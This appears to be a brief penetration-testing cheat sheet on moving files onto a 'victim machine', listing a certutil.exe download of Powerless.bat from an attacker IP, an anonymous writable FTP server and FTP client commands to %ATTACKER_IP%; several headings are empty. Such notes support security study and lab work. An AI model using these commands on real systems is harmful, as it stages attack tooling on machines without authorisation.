File Transfers
Windows
certutil.exe -urlcache -split -f "http://10.11.0.98/Powerless.bat" Powerless.batFTP
Server
pip install pyftpdlib
python -m pyftpdlib -p 21 -w
# On victim machine
ftp anonymous@10.11.0.98Windows client
ftp -A %ATTACKER_IP%
# switch to binary mode
binary
get <file-name>Linux Client
ftp $TARGET_IPPython
*It seems not working for large binary file.
SSH
SMB
Server
Windows client
Last updated
Was this helpful?